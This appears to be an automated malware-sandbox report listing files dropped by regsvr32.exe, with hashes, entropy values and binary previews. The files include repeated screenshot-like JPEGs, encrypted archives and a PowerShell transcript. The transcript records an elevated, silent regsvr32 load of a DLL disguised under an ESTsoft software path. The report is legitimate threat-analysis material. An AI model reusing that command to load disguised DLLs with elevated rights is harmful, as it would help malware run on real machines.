File Type:	Zip archive data, at least v2.0 to extract
Category:	dropped
Size (bytes):	45505
Entropy (8bit):	7.9950314671331215
Encrypted:	true
SSDEEP:	768:yxaYbt+DENJCQhL7hehnSu9c0eUFW6gznohHFjdJFYWUSyuD3/QKHj6SgPadp9mH:SrbIDkoQhLwQuS0VFLgTopFjjFiuDY2G
MD5:	5593A579ABF389B578F880B5203688E3
SHA1:	2B964098AEC107900CADCC8CD9B45D14B188AD68
SHA-256:	BC0D49CF6619D3665A0A8E93203C332E8BE947F184F7C99FA0F64A926B64686D
SHA-512:	19398C3C33694A3DF9C4E110BA3070E8C09FD8588B99E16EB23086211B43C6E7CBBE0A2B4673D57BCFC89151551F4E39E2229B9B8C2EB6AC3295DF6D6C66B204
Malicious:	false
Preview:	PK........lW.S................3AED.tmpUT...{.&a{.&az.&a...XU..7.O...........A.q....K@..i....F...%.....>........>.{...5..1.1~c.1.f.>..Jr.r..........i...............A.....ASH.C.\...L....IJ..{...ih]XLFniy.m...w.=)E.y..@...3P3.13......6......`...h,(.,..N.....~....AA....# "!.@".a..P00.0pp.....H8......S..G....;.WPl6".TU;...W.n..`$d\|.B"bZ:z.F&.^>~.A!i.Y9y.E%m.]=}.C#K+k.[;{.O/o..O\|.B.........OHLz......._PXT\R]S[W.....cGgWwOo_........./+.k...[.;..ON.._\....._..f.. ....E.o......X.p.8.%5....Pq.!.J.fW.#Qsk}...C...B..i?Z..5,.......v...0P......-:_.....,.......d.q.......<&U..:UX.0;u.V.T..X...h...Ow/..U.\LM.6.~.....)'.'7...K...O...g.Z6.x0.<`.6.V.V..+.mz...KW...2v......s#G.Eqa qA.=P^..S.Y.K.xM.....C..SMB.....i..9.._N..r..T...%..hn....u...0.:#{,v:...G..pdj...P.Kmsl..W.h3.....a.AD.!...Ra.........?...x...\|0....}....$....y.w?..]./...I.A.-....4..:.P...._..#=Z.B..Et.\|f..)..g.0@L4......C...,Kg.}p..7v.f.Q.....:...._.*..;IK.V....W...J..0R..v...c.;.tb..`...V..u.>....}

C:\ProgramData\temp\3BA1.tmp Download File
Process:	C:\Windows\System32\regsvr32.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 1280x1024, frames 3
Category:	dropped
Size (bytes):	64408
Entropy (8bit):	7.587474687549308
Encrypted:	false
SSDEEP:	768:rXpSb7QD5AZxoWNV9Zx2XEK1RniRS/1Q280DY3gVlZ46kSL+59YjypsYcLlD:r47QDkBV0xiRB28EY3QER6LR
MD5:	6A95989BDB33E31A1CBA8258F4199040
SHA1:	3E81CCB803AA348212AEA8C9E31831DE991F972B
SHA-256:	BECF15E2A0B9F9FA06C1E7CC9570CBB7E80C2BFA0CF04ECC8264E2AC590E9380
SHA-512:	D046D99601931A068F4832CC419E50DA93EA0AC8D50D9B875CD432B7413E5D488FA44933EC7134165D4B580283403D48F57A0C14B8D221CFD2938B5F9060F9F3
Malicious:	false
Preview:	......JFIF.....,.,.....C.............. (B+(%%(Q:=0B`Ued_U][jx..jq.s[].........g...........C....(#(N++N.n]n............................................................."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..&y...eA`[,3....3K.....1..).{.4\.K..T.....Wd.ZL....c.$\|.7....K...S]C!V....FA.F.O2.U$n......s...]...w.`}.g<g8.t....d`2UH......m.s.EnI...Nq.G@q...n...Oq,h%.\0?+.N@=......h#+.d`.FA. ..K%...f...)d......G.Zi./&f..aY7..NA9..C....n].7...3.)U..U..#..U7B.)...H.^J.I..?Lt..L.\.$..H..\..`..s..x.i.....2..v...'.R.P.K..d..j....q.a..2..q.~c.Q=..b.....*,....#..~.T....y..f.

C:\ProgramData\temp\4C70.tmp-PowerShell_transcript.910646.BLm8LGmw.20210825105913.txt Download File
Process:	C:\Windows\System32\regsvr32.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	5.147237381250279
Encrypted:	false
SSDEEP:	24:BxSAjTp3RCvi3OQx2DOXisXA3bEMWz0jeuKK6X4CIym1ZJXLVA3bEunxSAZQ:BZlRCvqOQoOCbWzCKYB1ZgbBZZQ
MD5:	0B7BBD141D7FB4542A1374C43369F80C
SHA1:	02C808E1E32696033002289F2AAA5D849C940437
SHA-256:	17FA171B58D2ABBB8C979F79E87D6D28AA938E7030D047DC2C6273F9A44874EC
SHA-512:	70A1EC6A5C0C2F84F3DAD0E2A179D84047AE1504F0F787BCB7B6FC7A97EE5598CF9F460C4326BA5536F7F636A094AC04A73E60C8B79FCDAC465159FF3B4E1245
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20210825105914..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 910646 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell.exe start-process regsvr32.exe -argumentlist '/s C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll' -verb runas..Process ID: 2324..PSVersion: 5.1.17134.165..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.165..BuildVersion: 10.0.17134.165..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20210825105914..******************..PS>start-process regsvr32.exe -argumentlist '/s C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll' -verb runas..******************..Command start time: 20210825110212..******************..PS>$global:?..True..*****************

C:\ProgramData\temp\4C70.tmp-PowerShell_transcript.910646.BLm8LGmw.20210825105913.txt.enc Download File
Process:	C:\Windows\System32\regsvr32.exe
File Type:	data
Category:	dropped
Size (bytes):	858
Entropy (8bit):	7.765355003533637
Encrypted:	false
SSDEEP:	12:bksmeVUxInvvFZWenB0EwJ6y/Hx7XRfWTQpVIROgEavqZdhGwR8DBOuwxgvAyn:bPmeuxcZpnwJl/xooKROgEavqEwRcMjy
MD5:	73F5709B2C848164692E604719D266D2
SHA1:	29029F55D29392FA3EE7FD1BFC3AC1D402FA393C
SHA-256:	8202F0E42125869988A141AC8A3FF9E7F4F5E6B9D7BCA6CE5037D0CDA80FE2BA
SHA-512:	48AF81813D3CE8354A1F442A10B6719BD1A39EC59D677CF0E82F451D6E7970ADF463AF048B007820142D6691EC23581B81D3C992D6B4456ECD592836D11EF059
Malicious:	false
Preview:	.....CY;....{5...LpY..M...z........Y...!.........,:a.B..sS...B...GL....<.....\|..P.d.s....m.?!..G..q..wg.%;..X.GS..T..c.P.0/N.....><x...oE-.........,~~9A....v......[.a.....W].J....oo.V+..(..<..z....Weg.M...c.k`.{...^,....R..n..>GG`.B...-qv...l.....:.I'F....L.2.D.p...35.l2......x...{4S....Y.v!u...j....`..._.<..U5..s.>.W..3.W...1..Yg..6.7....X...Uj......X~+3T.w.....D_w.E...1.a.....=D.t.Q\|...c......Yq.%c.t....,.c.K...U.a..c...R6.R..&6... ..\..N........5e.../.............3.>...R.......q}.xD...F.0.GE....Dm1.."&8,..[..\...&3......+.)..)....VKK.....V......sC........d..-.#.{.0h.]uZ.oWE..u...s..Rd^....p.Q,..V..g.a..W~.7/So..E...&.f...m......u...5.......P4"X.lb.=........e...eB....T....!..q...w..k........i.+ ..qoQ...tl....R...Y.o!.H.e.d!..m9\.'.O.Fk.n:4...c_=.rs...&Jv~..:.E.P.....%UV..p.....3K.8]>..Lv..w..Y..

C:\ProgramData\temp\4C70.tmp-PowerShell_transcript.910646.BLm8LGmw.20210825105913.txt.tmp Download File
Process:	C:\Windows\System32\regsvr32.exe
File Type:	PDF document, version 1.7
Category:	dropped
Size (bytes):	899
Entropy (8bit):	7.784352727522272
Encrypted:	false
SSDEEP:	24:Ydw5hCa4jD0kydwk+TlqrAvAYPvRdfCxD:Y3lD7yNqvbP5di
MD5:	DBDCA9F737B41F6075AA4A2839DCD797
SHA1:	37DE936A10C3B777AB2F2A6547BAF48F5395A5F6
SHA-256:	5637D2B7EB7DDB25A7F2A852DF12C910C643392466A58D7A7AB0B32F9ECE43DE
SHA-512:	E4210A516099A6C333B3BC0FF67562FEA455D5130265401E8DACE87E740C3BAE150AA8B742C066B86C50CB31E797BB848B18CB47A2DABC9C27C8DC6DBCA59FDB
Malicious:	false
Preview:	%PDF-1.7..4 0 obj....C..t.q.N.2s.4;...t32Yu2.].O..6...-].MZ.......E^..c......;-t..fUX......gg.Cj.Y.N...d.....$....P..Vbg..$..dK....<...%L..f.\|...G."..@8......[...{...C:4...Y...BS'.....z.2.j..8F..=#....m..v....9...B.,.._/.(.]..N./......x5.w.P.:8<S.o/,H ..F.&.....3..a....J.........:3r.g...yF%5.>/.'.9...2l..exR'.. g;....4......X..(..wH{..x......G...>UGE&..:.t.m\.hu..l.d..m...aQz.WR.)~e.fmc..3H.....4.....u..r@...0P.t..Np.0X1.Qz.....k......$]..:.N:..Ygnu...].>.BX#.........#...a..T.........[x.......=.u..1O.V.`..$......D.5..........5m...Q2..$_.ir(K..h....6g........d8_.5A9D.....qe.....D....\.m.I.$\....8.#..;...g.....j....p.!."86........r...D;gT4T..o.BW.(}..Y.[..Y.....{y....#.w......s....6&...C..+.......,...?....C.....'..p..l[.?.%..,...l_I,.F..;.....e..........m.S%>.......".. ...s.).U^BEp.y_..!.F.(.1amk:3.....3........P.ds(..>..n.

C:\ProgramData\temp\4C70.tmp-PowerShell_transcript.910646.BLm8LGmw.20210825105913.txt.zip Download File
Process:	C:\Windows\System32\regsvr32.exe
File Type:	Zip archive data, at least v2.0 to extract
Category:	dropped
Size (bytes):	838
Entropy (8bit):	7.2244931203068745
Encrypted:	false
SSDEEP:	12:5jISrht21PKrK6h7QsTaawQllNi9z0RwMQn0X5LSrht2Oi5KvSrht41iaUl:9A1PKrzh7Q2av0lU9My64q
MD5:	197BBB2CE7DF0000C5D6046E85CCD0D1
SHA1:	46BE4C765343BA8EDE7DE5BA7B77FC040D270D3F
SHA-256:	04D734A5402CC31BA05F8CE8261547A8984EFE9EF8AA435B70301043D5953461
SHA-512:	65B60824D607E5A76CB0EB9CC41336020EA9E35FB9F4EDBA420FDBB9FE0B620C8476A13EA9368969EDF988C3D64FC1F800655BF71EF02616DDE8F100657FD949
Malicious:	false
Preview:	PK........lW.S........B...A...4C70.tmp-PowerShell_transcript.910646.BLm8LGmw.20210825105913.txtUT...z.&a{.&a{.&a.S..0..[.;.......O.9..?.K.K.....&........j...x.....Jp ....x..f&.>.......:......-..YM.)5o-2.j.A._..(.!....dFb.>..%..r..w.......b.XM%..N^....c.J....r%.u....-o.t..i<EO7.....~..!.....$.......Xt...}...^........&.V%3.iV.{..=4....&........i.iUk.,..E.j..f..y..B5...s..J.34.gz.t'.. ;V.\..E..Y..t.znI@...4.....%3wV...n...`.{&E$..Q.M.M.M2..2.;..S._z.....s)..Gd..!...F.....;.Z..5.rY;iV.J..0..0.._...,.x.......o,..0..-........I.qN...'.P{.7..t..c..... X9..G.;PK........lW.S..7@....B...A...4C70.tmp-PowerShell_transcript.910646.BLm8LGmw.20210825105913.txtUT...z.&a{.&a{.&aPK..........lW.S..7@....B...A......... .......4C70.tmp-PowerShell_transcript.910646.BLm8LGmw.20210825105913.txtUT...z.&aPK..........x...H.....

C:\ProgramData\temp\5004.tmp Download File
Process:	C:\Windows\System32\regsvr32.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 1280x1024, frames 3
Category:	dropped
Size (bytes):	64408
Entropy (8bit):	7.587474687549308
Encrypted:	false
SSDEEP:	768:rXpSb7QD5AZxoWNV9Zx2XEK1RniRS/1Q280DY3gVlZ46kSL+59YjypsYcLlD:r47QDkBV0xiRB28EY3QER6LR
MD5:	6A95989BDB33E31A1CBA8258F4199040
SHA1:	3E81CCB803AA348212AEA8C9E31831DE991F972B
SHA-256:	BECF15E2A0B9F9FA06C1E7CC9570CBB7E80C2BFA0CF04ECC8264E2AC590E9380
SHA-512:	D046D99601931A068F4832CC419E50DA93EA0AC8D50D9B875CD432B7413E5D488FA44933EC7134165D4B580283403D48F57A0C14B8D221CFD2938B5F9060F9F3
Malicious:	false
Preview:	......JFIF.....,.,.....C.............. (B+(%%(Q:=0B`Ued_U][jx..jq.s[].........g...........C....(#(N++N.n]n............................................................."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..&y...eA`[,3....3K.....1..).{.4\.K..T.....Wd.ZL....c.$\|.7....K...S]C!V....FA.F.O2.U$n......s...]...w.`}.g<g8.t....d`2UH......m.s.EnI...Nq.G@q...n...Oq,h%.\0?+.N@=......h#+.d`.FA. ..K%...f...)d......G.Zi./&f..aY7..NA9..C....n].7...3.)U..U..#..U7B.)...H.^J.I..?Lt..L.\.$..H..\..`..s..x.i.....2..v...'.R.P.K..d..j....q.a..2..q.~c.Q=..b.....*,....#..~.T....y..f.

C:\ProgramData\temp\509C.tmp Download File
Process:	C:\Windows\System32\regsvr32.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 1280x1024, frames 3
Category:	dropped
Size (bytes):	64408
Entropy (8bit):	7.587474687549308
Encrypted:	false
SSDEEP:	768:rXpSb7QD5AZxoWNV9Zx2XEK1RniRS/1Q280DY3gVlZ46kSL+59YjypsYcLlD:r47QDkBV0xiRB28EY3QER6LR
MD5:	6A95989BDB33E31A1CBA8258F4199040
SHA1:	3E81CCB803AA348212AEA8C9E31831DE991F972B
SHA-256:	BECF15E2A0B9F9FA06C1E7CC9570CBB7E80C2BFA0CF04ECC8264E2AC590E9380
SHA-512:	D046D99601931A068F4832CC419E50DA93EA0AC8D50D9B875CD432B7413E5D488FA44933EC7134165D4B580283403D48F57A0C14B8D221CFD2938B5F9060F9F3
Malicious:	false
Preview:	......JFIF.....,.,.....C.............. (B+(%%(Q:=0B`Ued_U][jx..jq.s[].........g...........C....(#(N++N.n]n............................................................."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..&y...eA`[,3....3K.....1..).{.4\.K..T.....Wd.ZL....c.$\|.7....K...S]C!V....FA.F.O2.U$n......s...]...w.`}.g<g8.t....d`2UH......m.s.EnI...Nq.G@q...n...Oq,h%.\0?+.N@=......h#+.d`.FA. ..K%...f...)d......G.Zi./&f..aY7..NA9..C....n].7...3.)U..U..#..U7B.)...H.^J.I..?Lt..L.\.$..H..\..`..s..x.i.....2..v...'.R.P.K..d..j....q.a..2..q.~c.Q=..b.....*,....#..~.T....y..f.

C:\ProgramData\temp\596F.tmp Download File
Process:	C:\Windows\System32\regsvr32.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 1280x1024, frames 3
Category:	dropped
Size (bytes):	64408
Entropy (8bit):	7.587474687549308
Encrypted:	false
SSDEEP:	768:rXpSb7QD5AZxoWNV9Zx2XEK1RniRS/1Q280DY3gVlZ46kSL+59YjypsYcLlD:r47QDkBV0xiRB28EY3QER6LR
MD5:	6A95989BDB33E31A1CBA8258F4199040
SHA1:	3E81CCB803AA348212AEA8C9E31831DE991F972B
SHA-256:	BECF15E2A0B9F9FA06C1E7CC9570CBB7E80C2BFA0CF04ECC8264E2AC590E9380
SHA-512:	D046D99601931A068F4832CC419E50DA93EA0AC8D50D9B875CD432B7413E5D488FA44933EC7134165D4B580283403D48F57A0C14B8D221CFD2938B5F9060F9F3
Malicious:	false
Preview:	......JFIF.....,.,.....C.............. (B+(%%(Q:=0B`Ued_U][jx..jq.s[].........g...........C....(#(N++N.n]n............................................................."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..&y...eA`[,3....3K.....1..).{.4\.K..T.....Wd.ZL....c.$\|.7....K...S]C!V....FA.F.O2.U$n......s...]...w.`}.g<g8.t....d`2UH......m.s.EnI...Nq.G@q...n...Oq,h%.\0?+.N@=......h#+.d`.FA. ..K%...f...)d......G.Zi./&f..aY7..NA9..C....n].7...3.)U..U..#..U7B.)...H.^J.I..?Lt..L.\.$..H..\..`..s..x.i.....2..v...'.R.P.K..d..j....q.a..2..q.~c.Q=..b.....*,....#..~.T....y..f.

C:\ProgramData\temp\5E8.tmp Download File
Process:	C:\Windows\System32\regsvr32.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 1280x1024, frames 3
Category:	dropped
Size (bytes):	64408
Entropy (8bit):	7.587474687549308
Encrypted:	false
SSDEEP:	768:rXpSb7QD5AZxoWNV9Zx2XEK1RniRS/1Q280DY3gVlZ46kSL+59YjypsYcLlD:r47QDkBV0xiRB28EY3QER6LR
MD5:	6A95989BDB33E31A1CBA8258F4199040
SHA1:	3E81CCB803AA348212AEA8C9E31831DE991F972B
SHA-256:	BECF15E2A0B9F9FA06C1E7CC9570CBB7E80C2BFA0CF04ECC8264E2AC590E9380
SHA-512:	D046D99601931A068F4832CC419E50DA93EA0AC8D50D9B875CD432B7413E5D488FA44933EC7134165D4B580283403D48F57A0C14B8D221CFD2938B5F9060F9F3
Malicious:	false
Preview:	......JFIF.....,.,.....C.............. (B+(%%(Q:=0B`Ued_U][jx..jq.s[].........g...........C....(#(N++N.n]n............................................................."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..&y...eA`[,3....3K.....1..).{.4\.K..T.....Wd.ZL....c.$\|.7....K...S]C!V....FA.F.O2.U$n......s...]...w.`}.g<g8.t....d`2UH......m.s.EnI...Nq.G@q...n...Oq,h%.\0?+.N@=......h#+.d`.FA. ..K%...f...)d......G.Zi./&f..aY7..NA9..C....n].7...3.)U..U..#..U7B.)...H.^J.I..?Lt..L.\.$..H..\..`..s..x.i.....2..v...'.R.P.K..d..j....q.a..2..q.~c.Q=..b.....*,....#..~.T....y..f.

C:\ProgramData\temp\6407.tmp Download File
Process:	C:\Windows\System32\regsvr32.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 1280x1024, frames 3
Category:	dropped
Size (bytes):	64408
Entropy (8bit):	7.587474687549308
Encrypted:	false
SSDEEP:	768:rXpSb7QD5AZxoWNV9Zx2XEK1RniRS/1Q280DY3gVlZ46kSL+59YjypsYcLlD:r47QDkBV0xiRB28EY3QER6LR
MD5:	6A95989BDB33E31A1CBA8258F4199040
SHA1:	3E81CCB803AA348212AEA8C9E31831DE991F972B
SHA-256:	BECF15E2A0B9F9FA06C1E7CC9570CBB7E80C2BFA0CF04ECC8264E2AC590E9380
SHA-512:	D046D99601931A068F4832CC419E50DA93EA0AC8D50D9B875CD432B7413E5D488FA44933EC7134165D4B580283403D48F57A0C14B8D221CFD2938B5F9060F9F3
Malicious:	false
Preview:	......JFIF.....,.,.....C.............. (B+(%%(Q:=0B`Ued_U][jx..jq.s[].........g...........C....(#(N++N.n]n............................................................."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..&y...eA`[,3....3K.....1..).{.4\.K..T.....Wd.ZL....c.$\|.7....K...S]C!V....FA.F.O2.U$n......s...]...w.`}.g<g8.t....d`2UH......m.s.EnI...Nq.G@q...n...Oq,h%.\0?+.N@=......h#+.d`.FA. ..K%...f...)d......G.Zi./&f..aY7..NA9..C....n].7...3.)U..U..#..U7B.)...H.^J.I..?Lt..L.\.$..H..\..`..s..x.i.....2..v...'.R.P.K..d..j....q.a..2..q.~c.Q=..b.....*,....#..~.T....y..f.

C:\ProgramData\temp\7F3.tmp Download File
Process:	C:\Windows\System32\regsvr32.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 1280x1024, frames 3
Category:	dropped
Size (bytes):	64408
Entropy (8bit):	7.587474687549308
Encrypted:	false
SSDEEP:	768:rXpSb7QD5AZxoWNV9Zx2XEK1RniRS/1Q280DY3gVlZ46kSL+59YjypsYcLlD:r47QDkBV0xiRB28EY3QER6LR
MD5:	6A95989BDB33E31A1CBA8258F4199040
SHA1:	3E81CCB803AA348212AEA8C9E31831DE991F972B
SHA-256:	BECF15E2A0B9F9FA06C1E7CC9570CBB7E80C2BFA0CF04ECC8264E2AC590E9380
SHA-512:	D046D99601931A068F4832CC419E50DA93EA0AC8D50D9B875CD432B7413E5D488FA44933EC7134165D4B580283403D48F57A0C14B8D221CFD2938B5F9060F9F3
Malicious:	false
Preview:	......JFIF.....,.,.....C.............. (B+(%%(Q:=0B`Ued_U][jx..jq.s[].........g...........C....(#(N++N.n]n............................................................."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..&y...eA`[,3....3K.....1..).{.4\.K..T.....Wd.ZL....c.$\|.7....K...S]C!V....FA.F.O2.U$n......s...]...w.`}.g<g8.t....d`2UH......m.s.EnI...Nq.G@q...n...Oq,h%.\0?+.N@=......h#+.d`.FA. ..K%...f...)d......G.Zi./&f..aY7..NA9..C....n].7...3.)U..U..#..U7B.)...H.^J.I..?Lt..L.\.$..H..\..`..s..x.i.....2..v...'.R.P.K..d..j....q.a..2..q.~c.Q=..b.....*,....#..~.T....y..f.

C:\ProgramData\temp\83C3.tmp Download File
Process:	C:\Windows\System32\regsvr32.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 1280x1024, frames 3
Category:	dropped
Size (bytes):	64408
Entropy (8bit):	7.587474687549308
Encrypted:	false
SSDEEP:	768:rXpSb7QD5AZxoWNV9Zx2XEK1RniRS/1Q280DY3gVlZ46kSL+59YjypsYcLlD:r47QDkBV0xiRB28EY3QER6LR
MD5:	6A95989BDB33E31A1CBA8258F4199040
SHA1:	3E81CCB803AA348212AEA8C9E31831DE991F972B
SHA-256:	BECF15E2A0B9F9FA06C1E7CC9570CBB7E80C2BFA0CF04ECC8264E2AC590E9380
SHA-512:	D046D99601931A068F4832CC419E50DA93EA0AC8D50D9B875CD432B7413E5D488FA44933EC7134165D4B580283403D48F57A0C14B8D221CFD2938B5F9060F9F3
Malicious:	false
Preview:	......JFIF.....,.,.....C.............. (B+(%%(Q:=0B`Ued_U][jx..jq.s[].........g...........C....(#(N++N.n]n............................................................."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..&y...eA`[,3....3K.....1..).{.4\.K..T.....Wd.ZL....c.$\|.7....K...S]C!V....FA.F.O2.U$n......s...]...w.`}.g<g8.t....d`2UH......m.s.EnI...Nq.G@q...n...Oq,h%.\0?+.N@=......h#+.d`.FA. ..K%...f...)d......G.Zi./&f..aY7..NA9..C....n].7...3.)U..U..#..U7B.)...H.^J.I..?Lt..L.\.$..H..\..`..s..x.i.....2..v...'.R.P.K..d..j....q.a..2..q.~c.Q=..b.....*,....#..~.T....y..f.

C:\ProgramData\temp\85DD.tmp Download File
Process:	C:\Windows\System32\regsvr32.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 1280x1024, frames 3
Category:	dropped
Size (bytes):	64408
Entropy (8bit):	7.587474687549308
Encrypted:	false
SSDEEP:	768:rXpSb7QD5AZxoWNV9Zx2XEK1RniRS/1Q280DY3gVlZ46kSL+59YjypsYcLlD:r47QDkBV0xiRB28EY3QER6LR
MD5:	6A95989BDB33E31A1CBA8258F4199040
SHA1:	3E81CCB803AA348212AEA8C9E31831DE991F972B
SHA-256:	BECF15E2A0B9F9FA06C1E7CC9570CBB7E80C2BFA0CF04ECC8264E2AC590E9380
SHA-512:	D046D99601931A068F4832CC419E50DA93EA0AC8D50D9B875CD432B7413E5D488FA44933EC7134165D4B580283403D48F57A0C14B8D221CFD2938B5F9060F9F3
Malicious:	false
Preview:	......JFIF.....,.,.....C.............. (B+(%%(Q:=0B`Ued_U][jx..jq.s[].........g...........C....(#(N++N.n]n............................................................."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..&y...eA`[,3....3K.....1..).{.4\.K..T.....Wd.ZL....c.$\|.7....K...S]C!V....FA.F.O2.U$n......s...]...w.`}.g<g8.t....d`2UH......m.s.EnI...Nq.G@q...n...Oq,h%.\0?+.N@=......h#+.d`.FA. ..K%...f...)d......G.Zi./&f..aY7..NA9..C....n].7...3.)U..U..#..U7B.)...H.^J.I..?Lt..L.\.$..H..\..`..s..x.i.....2..v...'.R.P.K..d..j....q.a..2..q.~c.Q=..b.....*,....#..~.T....y..f.

C:\ProgramData\temp\8848.tmp Download File
Process:	C:\Windows\System32\regsvr32.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 1280x1024, frames 3
Category:	dropped
Size (bytes):	66090
Entropy (8bit):	7.595969014391596
Encrypted:	false
SSDEEP:	768:rXpSb7QD5AZxoWNV9Zx2XEK1RniRS/1Q280DY3gVlZ46kSL+576eod+V1dMZFAeW:r47QDkBV0xiRB28EY3QZH4SbPb0T
MD5:	FE8F032583FCC1FB9B11E68C28E5CB7E
SHA1:	B2A9B1735C0767169F661FD53296D46B5A42D8F4
SHA-256:	45A703E8983E5E03B0C4288615F6198E1C23C7F5B808A4EAC4CB33F7AE711BF8
SHA-512:	751298D796393371343E3131CFF2055B362DC260DF20E2370D9986A48C423D63E8A6D0363EC7A5E487FB9C4715C9C75365485EABA1F5B7C7BAB13197E947B6D9
Malicious:	false
Preview:	......JFIF.....,.,.....C.............. (B+(%%(Q:=0B`Ued_U][jx..jq.s[].........g...........C....(#(N++N.n]n............................................................."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..&y...eA`[,3....3K.....1..).{.4\.K..T.....Wd.ZL....c.$\|.7....K...S]C!V....FA.F.O2.U$n......s...]...w.`}.g<g8.t....d`2UH......m.s.EnI...Nq.G@q...n...Oq,h%.\0?+.N@=......h#+.d`.FA. ..K%...f...)d......G.Zi./&f..aY7..NA9..C....n].7...3.)U..U..#..U7B.)...H.^J.I..?Lt..L.\.$..H..\..`..s..x.i.....2..v...'.R.P.K..d..j....q.a..2..q.~c.Q=..b.....*,....#..~.T....y..f.

C:\ProgramData\temp\8848.tmp.enc Download File
Process:	C:\Windows\System32\regsvr32.exe
File Type:	data
Category:	dropped
Size (bytes):	46819
Entropy (8bit):	7.99605837396729
Encrypted:	true
SSDEEP:	768:e/w8JHLzlGNR8ApdNgRF7ZUiCmFoYh7c+0vPJZ4H3J4lkY7qBuDA9aueNc7jrY3:eo8RYJNgRoiCmFDhQhPJZ4H3ul7qq4sL
MD5:	720F610B44BB012C8748EF2A37E55952
SHA1:	8F73CB5314383A4ADAD188D32FB0ED6F8CE251C7
SHA-256:	FAF13F0595A73865E319C7FB0F1BF0FDF038783BF04407A93A89C0E429651C1B
SHA-512:	A76002BCC643793F41207E93F30F07C81BAD9A4C824E605B94F1344588C312C766729C7469BD0D74E47BD679F2F3C418370CE95B48B98DCCCF5D0BDC45C0EFCF
Malicious:	false
